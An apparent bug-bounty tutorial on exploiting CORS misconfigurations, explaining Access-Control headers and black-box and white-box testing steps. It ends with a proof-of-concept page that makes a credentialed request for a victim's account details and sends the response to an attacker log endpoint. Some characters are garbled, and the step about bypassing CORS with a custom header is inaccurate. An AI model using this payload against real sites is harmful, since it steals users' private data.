CORS Vulnerability in Bug Bounty Programs and Sample Exploitation Techniques

When it comes to bug bounty programs, one of the most common vulnerabilities that researchers encounter is Cross-Origin Resource Sharing (CORS) misconfigurations. CORS is a security mechanism that allows web browsers to make cross-origin requests, enabling web applications to interact with resources from different domains.

However, if CORS is not properly configured, it can lead to potential security risks. Attackers can exploit CORS misconfigurations to bypass the same-origin policy and perform unauthorized actions on behalf of the user, such as stealing sensitive information or performing actions on the victim’s behalf.

Here is a sample exploitation technique to help you better understand how CORS vulnerabilities can be exploited:

• Identify a target website that has a misconfigured CORS policy.
• Host a malicious website on a different domain.
• Create a script on the malicious website that sends a cross-origin request to the target website.
• Include a custom header in the request to bypass the CORS policy.
• Retrieve the response from the target website and extract any sensitive information.

It instructs the browser which resource to access from other websites
These headers start with “`Access Control“` for example,

Basically adds flexibility to the same origin policy.

HTTP/1.1 200 OK
Cache-Control: no-cache
Access-Control-Allow-Origin: https://a.com
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers:
cache-control, content-language, expires, last-modified, content-range, content-length, accept-ranges
Cache-Control: no-cache
Content-Туре: application/json
Vary: Accept-Encoding
Connection: close
Content-Length: 15
{"status": "ok"}```

Access-Control-Allow-Origin : describes which origin can access the response, if the header is set to wildcard then the it can access resources from any origin
Access-Control-Allow-Credentials : indicates if request can contain credentials, if this is set to true any request sent will include the cookies and by default this header is set to false.
Access-Control-Expose-Headers : allowing certain headers.

Blackbox Testing of this misconfiguration:

* Map the application
* Test the application for dynamic generation
– Does it refelct ACAO headers or not.(changing the values of the headers of the website)
– some use regex to validate the string.
– Does it allow null origin
– Does it restrict the protocol
– Does it allow passing the credentials
* once cors is found determine the impact of it.

White box

* Determine the frameworks used.
* find out if that stack allows for cors configuration
* review code to identify any misconfiguration in cors rules

Exploitation

* If the application allows for credentials.
– This it the poc used to exploit cors:

<html> ‹body›
<h1›Hello World!‹/h1>
<scripts>
var xhr = new XMLHttpRequest () ;
var url = "<https://vulnerable-site.com>"
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch("/log?key=" + xhr.responseText)
}
}
xhr.open ('GET', url + "/accountDetails", true);
xhr.withCredentials = true;
xhr.send (null);
‹/script> </bodv>

</html>

By exploiting the misconfigured CORS policy, an attacker can gain unauthorized access to sensitive data or perform actions on behalf of the victim. It is crucial for organizations to properly configure their CORS policies to prevent such attacks.

Bug bounty programs often reward researchers who discover and report CORS vulnerabilities, as they can have significant security implications. If you are participating in a bug bounty program, make sure to thoroughly test for CORS misconfigurations and report any findings to the program administrators.

Remember, responsible disclosure is essential when reporting vulnerabilities. Always follow the guidelines provided by the bug bounty program and maintain open communication with the program administrators.